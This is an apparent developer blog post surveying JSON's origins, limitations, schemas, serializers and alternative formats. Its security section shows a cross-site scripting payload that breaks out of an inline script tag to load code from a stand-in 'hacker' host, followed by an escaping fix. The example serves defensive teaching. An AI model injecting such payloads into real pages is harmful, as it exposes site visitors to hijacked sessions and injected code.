JSON, JSON, JSON

stereobooster - Sep 23 '18 - Dev Community

All things about JSON.

Beginning

JSON was born out of web platform limitations and a bit of creativity. There was XMLHttpRequest to make requests to the server without a full page reload, but XML is "heavy" on the wire, so Douglas Crockford came up with a clever trick: we can use JavaScript Object Notation and eval to pass data from the server to the client (or vice versa) in an easy way. But it is not safe to execute arbitrary code (eval), especially if it comes from a third-party source, so the next step was to standardize the format and implement a dedicated parser for it. Later it became a standard in all browsers, and now we can use it as JSON.parse.

Limitations

Taking into account how it was born, JSON comes with some limitations.

Asymmetric encoding/decoding

You know how JS tries to pretend that type errors don't exist and coerces values at any cost, even when it doesn't make much sense. This means that x == JSON.parse(JSON.stringify(x)) doesn't always hold true. For example:

  • Date will be turned into its string representation, and after decoding it will stay a string
  • Map, WeakMap, Set, WeakSet will be turned into "{}" - they lose both contents and type
  • BigInt, for a change, throws TypeError: Do not know how to serialize a BigInt
  • a function will be converted to undefined (and dropped entirely when it is an object property)
  • undefined will be converted to undefined
  • ES6 classes and new function(){} will be converted into a representation of a plain object, but will lose the type
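
A quick check in Node or the browser console shows the asymmetry (a minimal sketch; the exact output formatting depends on the engine):

const x = { date: new Date(), set: new Set([1, 2]), fn: () => 1, missing: undefined };
const y = JSON.parse(JSON.stringify(x));

console.log(y.date);                    // a string like "2018-09-23T10:00:00.000Z", not a Date
console.log(y.set);                     // {} - contents and type are gone
console.log("fn" in y, "missing" in y); // false false - both keys were dropped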

Solution: one possible solution here is to use a static type system, like TypeScript or Flow, to prevent asymmetric types:

// inspired by https://github.com/tildeio/ts-std/blob/master/src/json.ts
export type JSONValue =
  | string
  | number
  | boolean
  | null
  | JSONObject
  | JSONArray;
type JSONObject = {[key: string]: JSONValue};
type JSONArray = Array<JSONValue>;

export const symetricStringify = (x: JSONValue) => JSON.stringify(x);

This will not save us from TypeError: Converting circular structure to JSON, but we will get to that later.

Security: script injection

If you use JSON as a way to pass data from the server to the client inside HTML, for example, as the initial value for a Redux store in the case of server-side rendering, or with gon in Ruby, be aware that there is a risk of a script injection attack:

<script>
  var data = {user_input: "</script><script src=http://hacker/script.js>"}
</script>

Solution: escape JSON before embedding it in HTML

const UNSAFE_CHARS_REGEXP = /[<>\/\u2028\u2029]/g;
// Mapping of unsafe HTML and invalid JavaScript line terminator chars to their
// Unicode char counterparts which are safe to use in JavaScript strings.
const ESCAPED_CHARS = {
  "<": "\\u003C",
  ">": "\\u003E",
  "/": "\\u002F",
  "\u2028": "\\u2028",
  "\u2029": "\\u2029"
};
const escapeUnsafeChars = unsafeChar => ESCAPED_CHARS[unsafeChar];
const escape = str => str.replace(UNSAFE_CHARS_REGEXP, escapeUnsafeChars);
export const safeStringify = (x) => escape(JSON.stringify(x));
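
Usage in a server-rendered template could look roughly like this (a sketch; window.__INITIAL_STATE__ and initialState are just illustrative names):

// somewhere in the server-side rendering code
const html = `
  <script>
    window.__INITIAL_STATE__ = ${safeStringify(initialState)};
  </script>`;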

Side note: collection of JSON implementation vulnerabilities

Lack of schema

JSON is schemaless - it makes sense because JS is dynamically typed. But this means that you need to verify the shape (the types) yourself; JSON.parse won't do it for you.

Solution: I wrote about this problem before - use IO validation
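
With io-ts (which is also used later in this post), a check on parsed data could look roughly like this (a sketch; the User shape is made up for illustration):

import * as t from "io-ts";

const User = t.type({ id: t.number, name: t.string });

// decode returns an Either: a Right with the typed value, or a Left with validation errors
const result = User.decode(JSON.parse('{"id": 1, "name": "Ada"}'));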

Side note: there are also other solutions, like JSON API, Swagger, and GraphQL.

Lack of schema and serializer/parser

Having a schema for the parser can solve the asymmetry issue for Date. If we know that we expect a Date in some place, we can use the string representation to create a JS Date out of it.

Having a schema for the serializer can solve the issue for BigInt, Map, WeakMap, Set, WeakSet, ES6 classes and new function(){}. We can provide a specific serializer/parser for each type.

import * as t from 'io-ts'

const DateFromString = new t.Type<Date, string>(
  'DateFromString',
  (m): m is Date => m instanceof Date,
  (m, c) =>
    t.string.validate(m, c).chain(s => {
      const d = new Date(s)
      return isNaN(d.getTime()) ? t.failure(s, c) : t.success(d)
    }),
  a => a.toISOString()
)
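
Encoding and decoding through such a codec is then symmetric (a quick sketch using the codec above):

const encoded = DateFromString.encode(new Date(0)); // "1970-01-01T00:00:00.000Z"
const decoded = DateFromString.decode(encoded);     // a Right containing a real Date again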

Side note: see also this proposal

Lack of schema and performance

Having a schema can improve the performance of the parser. For example, see jitson and FAD.js.

Side note: see also fast-json-stringify
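
On the serialization side, fast-json-stringify compiles a stringify function from a JSON Schema; a rough sketch:

const fastJson = require("fast-json-stringify");

// compile the stringifier from a JSON Schema once, reuse it for every payload
const stringify = fastJson({
  type: "object",
  properties: {
    id: { type: "integer" },
    name: { type: "string" }
  }
});

stringify({ id: 1, name: "Ada" }); // '{"id":1,"name":"Ada"}'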

Stream parser/serializer

When JSON was invented, nobody thought about using it for gigabytes of data. If you want to do something like that, take a look at a streaming parser.

Also, you can use a JSON stream to improve UX with a slow backend - see oboejs.
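
With oboe.js, for example, you can start handling items as they arrive instead of waiting for the whole response (a sketch; the URL, the node pattern and renderRow are made up):

import oboe from "oboe";

oboe("/api/items")          // starts streaming the response
  .node("items.*", item => {
    renderRow(item);        // hypothetical render function, called once per item
  })
  .done(fullResponse => {
    console.log("whole document parsed", fullResponse);
  });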

Beyond JSON

uneval

If you want to serialize actual JS code and preserve types, references and cyclic structures, JSON will not be enough. You will need an "uneval". Check out some "variations on this tune":

  • LJSON - JSON extended with pure functions
  • serialize-javascript - Serialize JavaScript to a superset of JSON that includes regular expressions, dates and functions
  • arson - Efficient encoder and decoder for arbitrary objects
  • ResurrectJS preserves object behavior (prototypes) and reference circularity with a special JSON encoding
  • serializr - Serialize and deserialize complex object graphs to and from JSON and Javascript classes
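
As an illustration, serialize-javascript can round-trip things that plain JSON drops (a sketch; note that the result is JavaScript source, so it has to be evaluated, not JSON.parsed):

import serialize from "serialize-javascript";

const code = serialize({ when: new Date(0), pattern: /ab+c/i, greet: () => "hi" });
// the Date, the RegExp and the function are emitted as JavaScript code inside the object literal

const restored = eval("(" + code + ")"); // types survive, unlike with JSON.parse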

As a configuration file

JSON was invented to transmit data, not to store configuration. Yet people use it for configuration because it is an easy option.

JSON lacks comments, requires quotes around keys, prohibits a trailing comma at the end of an array or object, and requires paired {} and []. There is no real solution for this except to use another format, like JSON5, YAML or TOML.
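
For comparison, JSON5 fixes exactly those pain points while staying a superset of JSON (a sketch using the json5 package; the config keys are made up):

import JSON5 from "json5";

const config = JSON5.parse(`{
  // comments are allowed
  port: 8080,        // unquoted keys
  plugins: [
    "typescript",    // trailing commas are fine
  ],
}`);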

Binary data

JSON is more compact than XML, yet still not the most compact option. Binary formats are even more efficient. Check out MessagePack.

Side note: GraphQL is not tied to JSON, so you can use MessagePack with GraphQL.
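
A minimal sketch with the @msgpack/msgpack package (assuming that is the implementation you pick; msgpack.org lists many others):

import { encode, decode } from "@msgpack/msgpack";

const payload = { id: 1, tags: ["json", "binary"] };

const bytes = encode(payload); // a Uint8Array with the MessagePack encoding
const back = decode(bytes);    // { id: 1, tags: ["json", "binary"] }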

Binary data and schema

Having a binary format with a schema allows some crazy optimizations, like random access or zero-copy. Check out Cap'n Proto.

Query language

JSON (like anything JS-related) is super popular, so people need to work with it more and more and have started to build tools around it, like JSONPath and jq.

Did I miss something?

Leave a comment if I missed something. Thanks for reading.


Follow me on Twitter and GitHub.
